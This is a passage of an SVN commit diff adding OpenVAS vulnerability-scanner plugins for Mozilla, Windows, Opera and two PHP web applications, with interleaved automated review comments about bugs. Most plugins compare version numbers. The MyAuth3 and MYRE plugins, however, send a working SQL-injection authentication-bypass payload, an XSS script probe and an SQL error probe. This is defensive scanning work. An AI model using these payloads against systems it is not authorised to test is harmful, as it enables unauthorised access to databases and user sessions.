+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if((seaVer =~ "^1\.*")||
+     version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  # Grep for Thunderbird version
+  if((tbVer =~ "^2\.*")||
+      version_in_range(version:tbVer, test_version:"3.0", test_version2:"3.1.11")){
+    security_hole(0);
+  }
+}
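Review bot: The regex in `if((seaVer =~ "^1\.*")||` makes the dot optional (`\.*` is zero or more dots), so it matches any version string whose first character is 1, including a future 10.x or 11.x, and the Thunderbird pattern `if((tbVer =~ "^2\.*")||` has the same problem for 20.x and up. The intent is a 1.x / 2.x major-version match, so `seaVer =~ "^1\."` and `tbVer =~ "^2\."` express it; as written the check will raise false positives once those products reach a matching major number.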

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_mult_vuln_sep11_win02.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,124 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_mult_vuln_sep11_win02.nasl 16832 2011-09-06 12:15:33Z sep $
+#
+# Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802153);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2985", "CVE-2011-2986", "CVE-2011-2987",
+                "CVE-2011-2988", "CVE-2011-2989", "CVE-2011-2991",
+                "CVE-2011-2992");
+  script_bugtraq_id(49224, 49227, 49226, 49242, 49239, 49243, 49245);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/thunderbird/seamonkey
+  and is prone to multiple vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - An error when using Windows D2D hardware acceleration, allows attacker to
+    obtain sensitive image data from a different domain.
+  - Heap overflow in the Almost Native Graphics Layer Engine(ANGLE) library
+    used in WebGL implementation.
+  - Buffer overflow error in the WebGL shader implementation.
+  - An error in the browser engine, it fails to implement WebGL, JavaScript
+  - An error in the Ogg reader in the browser engine.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code in the
+  context of the user running an affected application. Failed exploit attempts
+  will result in a denial-of-service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Thunderbird version before 6
+  SeaMonkey version 2.0 through 2.2
+  Mozilla Firefox version 4.x through 5
+
+  Fix: Upgrade to Mozilla Firefox version 6.0 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  Upgrade to Thunderbird version to 6.0 or later
+  http://www.mozilla.org/en-US/thunderbird/
+
+  References:
+  http://secunia.com/advisories/45581
+  http://www.mozilla.org/security/announce/2011/mfsa2011-29.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/Thunderbird/SeaMonkey");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl",
+                      "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver",
+                       "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_in_range(version:ffVer, test_version:"4.0", test_version2:"5.0.1")){
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if(version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  # Grep for Thunderbird version
+  if(version_is_less(version:tbVer, test_version:"6.0")){
+    security_hole(0);
+  }
+}
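Review bot: The fourth bullet of the description string, `- An error in the browser engine, it fails to implement WebGL, JavaScript` (L838), is an unfinished sentence that stops mid-list and is shown to users verbatim through script_description. Complete it or fold it into the neighbouring bullets, e.g. `- Unspecified errors in the browser engine's WebGL and JavaScript handling.`, keeping the wording aligned with the referenced advisory. Separately, the Firefox and SeaMonkey branches test `if(ffVer)` / `if(seaVer)` while the Thunderbird branch tests `if(tbVer != NULL)`; using one form for all three version checks would make the file easier to read.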

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,101 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_sec_bypass_n_info_disc_vuln_win.nasl 16832 2011-09-06 12:15:33Z sep $
+#
+# Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802152);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-2990", "CVE-2011-2993");
+  script_bugtraq_id(49246, 49248);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/seamonkey and is prone
+  to information disclosure and security bypass vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to implementation errors,
+  - In Content Security Policy (CSP) violation reports, which fails to remove
+    proxy-authorization credentials from the listed request headers.
+  - In digital signatures for JAR files, which fails to prevent calls from
+    unsigned JavaScript code to signed code.
+
+  Impact:
+  Successful exploitation will allow attackers to obtain sensitive information
+  and bypass the application's security mechanism.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  SeaMonkey version 2.0 through 2.2
+  Mozilla Firefox version 4.x through 5
+
+  Fix: Upgrade to Mozilla Firefox version 6.0 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  References:
+  http://secunia.com/advisories/45581
+  http://www.mozilla.org/security/announce/2011/mfsa2011-29.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/SeaMonkey");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_in_range(version:ffVer, test_version:"4.0", test_version2:"5.0.1"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if(version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2")){
+     security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_mozilla_prdts_svg_code_exec_vuln_win.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,118 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_mozilla_prdts_svg_code_exec_vuln_win.nasl 16832 2011-08-24 13:15:33Z aug $
+#
+# Mozilla Products 'SVG' Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802147);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-0084");
+  script_bugtraq_id(49213);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Mozilla Products 'SVG' Code Execution Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with Mozilla firefox/thunderbird/seamonkey
+  and is prone to arbitrary code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in 'SVGTextElement.getCharNumAtPosition'
+  function, which fails to properly handle SVG text.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code in the
+  context of the affected application. Failed exploit attempts will likely
+  result in denial-of-service conditions.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  SeaMonkey version 2.0 through 2.2
+  Thunderbird version 3.0 through 3.1.11
+  Mozilla Firefox version before 3.6.20 and 4.x through 5.0.1
+
+  Fix: Upgrade to Mozilla Firefox version 3.6.20 or 6.0 or later,
+  For updates refer, http://www.mozilla.com/en-US/firefox/all.html
+
+  Upgrade to SeaMonkey version to 2.3 or later
+  http://www.mozilla.org/projects/seamonkey/
+
+  Upgrade to Thunderbird version to 3.1.12 or later
+  http://www.mozilla.org/en-US/thunderbird/
+
+  References:
+  https://bugzilla.redhat.com/show_bug.cgi?id=730519
+  http://www.mozilla.org/security/announce/2011/mfsa2011-30.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Mozilla Firefox/Thunderbird/SeaMonkey");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_firefox_detect_win.nasl",
+                      "gb_seamonkey_detect_win.nasl",
+                      "gb_thunderbird_detect_win.nasl");
+  script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver",
+                       "Thunderbird/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Firefox Check
+ffVer = get_kb_item("Firefox/Win/Ver");
+if(ffVer)
+{
+  # Grep for Firefox version
+  if(version_is_less(version:ffVer, test_version:"3.6.20")||
+     version_in_range(version:ffVer, test_version:"4.0", test_version2:"5.0.1"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# SeaMonkey Check
+seaVer = get_kb_item("Seamonkey/Win/Ver");
+if(seaVer)
+{
+  # Grep for SeaMonkey version
+  if(version_in_range(version:seaVer, test_version:"2.0", test_version2:"2.2"))
+  {
+     security_hole(0);
+     exit(0);
+  }
+}
+
+# Thunderbird Check
+tbVer = get_kb_item("Thunderbird/Win/Ver");
+if(tbVer != NULL)
+{
+  # Grep for Thunderbird version
+  if(version_in_range(version:tbVer, test_version:"3.0", test_version2:"3.1.11")){
+    security_hole(0);
+  }
+}
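Review bot: This plugin cites the same advisory (mfsa2011-30, L1093) as the preceding file, but the two disagree on the affected range: the preceding file's SeaMonkey and Thunderbird checks also flag 1.x and 2.x releases (`seaVer =~ "^1\.*"`, `tbVer =~ "^2\.*"` at L766 and L779), whereas here only 2.0 through 2.2 and 3.0 through 3.1.11 are reported (L1129, L1141). The description at L1078–L1079 matches the narrower code, so the difference may be deliberate, but confirming the intended range against the advisory would avoid one of the two plugins silently under- or over-reporting for the same issue.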

Added: trunk/openvas-plugins/scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_win_fraudulent_digital_cert_spoofing_vuln.nasl 16939 2011-09-08 12:40:05Z sep $
+#
+# Fraudulent Digital Certificates Spoofing Vulnerability (2607712)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801975);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Fraudulent Digital Certificates Spoofing Vulnerability (2607712)");
+  desc = "
+  Overview: The host is installed with Microsoft Windows operating system and
+  is prone to spoofing vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error when handling the fraudulent digital
+  certificates issued by Comodo and it is not properly validating its
+  identity.
+
+  Impact:
+  Successful exploitation will allow remote attackers to spoof content, perform
+  phishing attacks or perform man-in-the-middle attacks against all Web browser
+  users including users of Internet Explorer.
+
+  Impact Level: System
+
+  Affected Software/OS:
+  Windows 7 Service Pack 1 and prior
+  Windows XP Service Pack 3 and prior
+  Windows Vista Service Pack 2 and prior
+  Windows Server 2003 Service Pack 2 and prior
+  Windows Server 2008 Service Pack 2 and prior
+
+  Fix: Apply the Patch from below link,
+  For updates refer, http://support.microsoft.com/kb/2607712
+
+  References:
+  http://support.microsoft.com/kb/2607712
+  http://www.microsoft.com/technet/security/advisory/2607712.mspx ";
+
+  script_description(desc);
+  script_summary("Check for the Microsoft Windows");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Windows");
+  script_dependencies("secpod_reg_enum.nasl");
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+include("secpod_reg.inc");
+
+## Confirm Windows
+if(!get_kb_item("SMB/WindowsVersion")){
+  exit(0);
+}
+
+## Check for OS and Service Pack
+if(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){
+  exit(0);
+}
+
+## Check Hotfix 2607712
+if(!(hotfix_missing(name:"2607712") == 0)){
+  security_warning(0);
+}
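Review bot: The final condition `if(!(hotfix_missing(name:"2607712") == 0))` (L1238) is a double negation that reads as "report unless the hotfix is present"; if hotfix_missing can return a value other than 0 or 1 on a registry or lookup failure, that error value is also reported as a missing patch. The clearer and stricter form is `if(hotfix_missing(name:"2607712") == 1)`, which reports only the positive case. The helper's return contract is not visible from this hunk, so confirm its error return before changing the comparison.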

Added: trunk/openvas-plugins/scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_myauth3_gateway_blind_sql_inj_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,108 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_myauth3_gateway_blind_sql_inj_vuln.nasl 17035 2011-09-09 10:50:29 sep $
+#
+# MyAuth3 Gateway 'pass' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801980);
+  script_version("$Revision: 1.0$");
+  script_bugtraq_id(49530);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("MyAuth3 Gateway 'pass' Parameter SQL Injection Vulnerability");
+  desc = "
+  Overview: This host is running MyAuth3 Gateway and is prone SQL injection
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw exists due to the error in 'index.php', which fails to sufficiently
+  sanitize user-supplied input via 'pass' parameter before using it in SQL
+  query.
+
+  Impact:
+  Successful exploitation will allow remote attackers to view, add, modify or
+  delete information in the back-end database.
+
+  Impact Level: Application
+
+  Affected Software :
+  MyAuth3 Gateway version 3.0
+
+  Fix: No solution or patch is available as on 09th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.tmsoft.com.br/index.php
+
+  References:
+  http://doie.net/?p=578
+  http://www.1337day.com/exploits/16858
+  http://www.exploit-db.com/exploits/17805/ ";
+
+  script_description(desc);
+  script_summary("Determine SQL injection vulnerability in MyAuth3 Gateway");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 1881);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Check for the default port
+myaPort = get_http_port(default:1881);
+if(!myaPort){
+  myaPort = 1881;
+}
+
+## Check the port state
+if(!get_port_state(myaPort)){
+  exit(0);
+}
+
+## request index page
+sndReq = http_get(item:"/index.php", port:myaPort);
+rcvRes = http_send_recv(port:myaPort, data:sndReq);
+
+## Confirm the Application
+if(">MyAuth3 Gateway</" >< rcvRes);
+{
+  ## Try an exploit
+  authVariables ="panel_cmd=auth&r=ok&user=pingpong&pass=%27+or+1%3D1%23";
+
+  ## Construct post request
+  sndReq = string("POST /index.php?console=panel HTTP/1.1\r\n",
+                   "Host: ", get_host_name(), "\r\n",
+                   "Content-Type: application/x-www-form-urlencoded\r\n",
+                   "Content-Length: ", strlen(authVariables), "\r\n\r\n",
+                   authVariables);
+  rcvRes = http_keepalive_send_recv(port:myaPort, data:sndReq);
+
+  ## Check the Response
+  if("cotas" >< rcvRes && ">Alterar" >< rcvRes && "senha&" >< rcvRes){
+    security_hole(myaPort);
+  }
+}
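Review bot: The application-confirmation test at L1337, `if(">MyAuth3 Gateway</" >< rcvRes);`, ends in a semicolon, so the `if` governs an empty statement and the brace block that follows (L1338–L1354) runs unconditionally. As written, the authentication POST is sent to every host with that port open rather than only to confirmed MyAuth3 instances, and the banner check contributes nothing to the result. Drop the stray semicolon: `if(">MyAuth3 Gateway</" >< rcvRes)`.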

Added: trunk/openvas-plugins/scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,120 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_myre_real_estate_mult_xss_n_sql_inj_vuln.nasl 17039 2011-09-09 17:14:14Z sep $
+#
+# MYRE Real Estate Software Multiple XSS and SQL Injection Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802157);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("MYRE Real Estate Software Multiple XSS and SQL Injection Vulnerabilities");
+  desc = "
+  Overview: The host is running MYRE Real Estate Software and is prone to
+  multiple cross site scripting and SQL injection vulnerabilities
+
+  Vulnerability Insight:
+  The flaws are caused due to input passed to the
+  - 'page' parameter in findagent.php is not properly sanitized before being
+    used in SQL queries.
+  - 'country1', 'state1', and 'city1' parameters in findagent.php are not
+    properly verified before it is returned to the user.
+
+  Impact:
+  Successful exploitation will let the attacker to execute arbitrary HTML and
+  script code in a user's browser session in the context of a vulnerable site
+  and to cause SQL Injection attack to gain sensitive information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  MYRE Real Estate Software.
+
+  Fix: No solution or patch is available as on 9th September, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://myrephp.com/
+
+  References:
+  http://secpod.org/blog/?p=346
+  http://www.exploit-db.com/exploits/17811
+  http://secpod.org/advisories/SECPOD_MRS_SQL_XSS_Vuln.txt ";
+
+  script_description(desc);
+  script_summary("Check if MYRE Real Estate Software is prone to XSS and SQL Injection Vulnerability");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+foreach dir(make_list("/realestate", "", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item: string (dir, "/index.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the application
+  if('MYRE Real Estate Software' >< res)
+  {
+    ## Try XSS exploit
+    req = http_get(item:string(dir, "/findagent.php?country1=<script>alert" +
+                          "(/document.cookie/)</script>"), port:port);
+    res = http_keepalive_send_recv(port:port,data:req);
+
+    # check the response to confirm vulnerability
+    if('"><script>alert(/document.cookie/)</script>' >< res){
+      security_hole(port:port);
+      exit(0);
+    }
+
+    ## Check for the SQL injection
+    req = http_get(item:string(dir, "/findagent.php?page='"), port:port);
+    res = http_keepalive_send_recv(port:port,data:req);
+
+    ## Check the SQL result
+    if(">You have an error in your SQL syntax;" >< res)
+    {
+      security_hole(port:port);
+      exit(0);
+    }
+  }
+}
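Review bot: The XSS request and its response check do not agree: the request at L1459–L1460 sends `country1=<script>alert(/document.cookie/)</script>`, but the match at L1464 looks for `'"><script>alert(/document.cookie/)</script>'`, whose leading `">` was never sent. Unless findagent.php happens to emit `">` immediately before the reflected value, the comparison never matches and the script falls through to the SQL test, producing a false negative for the XSS finding. Make the check look for what was actually sent, `if('<script>alert(/document.cookie/)</script>' >< res){`, or use the same string in both the request and the check.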

Added: trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl	2011-09-09 11:52:42 UTC (rev 11593)
+++ trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_macosx.nasl	2011-09-09 15:36:48 UTC (rev 11594)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_opera_extented_validation_info_disc_vuln_macosx.nasl 17032 2011-09-09 17:11:11Z sep $
+#
+# Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802333);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-3388","CVE-2011-3389");
+  script_bugtraq_id(49388);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Opera Extended Validation Information Disclosure Vulnerabilities (Mac OS X)");
+  desc = "
+  Overview: The host is installed with Opera and is prone to information
+  disclosure vulnerability.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to, an error when loading content from trusted
+  sources in an unspecified sequence that causes the address field and page
+  information dialog to contain security information based on the trusted site
+  and loading an insecure site to appear secure via unspecified actions related
+  to Extended Validation.
+
+  Impact:
+  Successful exploitation allows remote attackers to steal sensitive security
+  information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Opera version before 11.51.
+
+  Fix: Upgrade to Opera version 11.51 or later
+  For updates refer, http://www.opera.com/download/
+
+  References:
+  http://osvdb.org/74828
+  http://osvdb.org/show/osvdb/74829
+  http://secunia.com/advisories/45791
+  http://www.securitytracker.com/id?1025997
+  http://www.opera.com/support/kb/view/1000/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of Opera");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("gb_opera_detect_macosx.nasl");
+  script_require_keys("Opera/MacOSX/Version");
+  exit(0);
+}
+
+include("version_func.inc");
+
+operaVer = get_kb_item("Opera/MacOSX/Version");
+if(!operaVer){
+  exit(0);
+}
+
+# Check for opera version < 11.51
+if(version_is_less(version:operaVer, test_version:"11.51")){
+  security_hole(0);
+}
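Review bot: `script_tag(name:"cvss_base", value:"10.0")` together with `risk_factor` Critical (L1519–L1520) sits oddly next to an Impact section that describes the issue as information disclosure and misleading security indicators (L1533–L1535); a 10.0 base score implies complete confidentiality, integrity and availability impact. Please confirm the score against the referenced advisories and, if it is lower, adjust both tags; the same values appear in the Windows counterpart gb_opera_extented_validation_info_disc_vuln_win.nasl (L1611–L1612). A minor style point: this file ends the affected-version line with a period (L1540) and the fix line without one (L1542), the reverse of the Windows file (L1632, L1634); aligning the two otherwise identical texts would make future diffs cleaner.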

Added: trunk/openvas-plugins/scripts/gb_opera_extented_validation_info_disc_vuln_win.nasl
===================================================================
